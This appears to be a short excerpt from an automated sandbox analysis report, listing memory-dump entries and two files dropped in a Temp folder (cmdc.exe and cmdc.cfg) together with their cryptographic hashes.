SHA512 cb6d3636be4330aa2fd577c3636d0b7165f92ee817e98f21180ba0c918eb76f4e38f025086593a0e508234ca981cfec2c53482b0e9cc0acfa885fefbdf89913c

memory/3776-155-0x0000000000000000-mapping.dmp

memory/1300-156-0x0000000000000000-mapping.dmp

memory/2528-157-0x0000000000000000-mapping.dmp

memory/2976-158-0x0000000000000000-mapping.dmp

memory/652-159-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\cmdc.exe

MD5 54e8ded7b148a13d3363ac7b33f6eb06
SHA1 63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9
SHA256 400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342
SHA512 bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349

C:\Users\Admin\AppData\Local\Temp\cmdc.cfg

MD5 70e69155b8080b5db35191ab8426d084
SHA1 383deaaee90ce71b28b0a6e22124e77aa1cccf8b
SHA256 104e0212403148a018258ef005a64ec73f0a148dbee230cb5c91dd691d03aefe
SHA512 c718c69454e4d9bcac24c918bf4c7f05ab93910b8a4701bd1dc914a9ca13dffe5f083f30881b5796d239c11be2f8b3e38a7e2ac7dcabc3d9810f59d9228bf342

memory/3956-163-0x0000000000000000-mapping.dmp

memory/1528-164-0x0000000000000000-mapping.dmp

memory/3496-165-0x0000000000000000-mapping.dmp

memory/4004-166-0x0000000000000000-mapping.dmp

memory/980-167-0x0000000000000000-mapping.dmp

memory/1804-168-0x0000000000000000-mapping.dmp
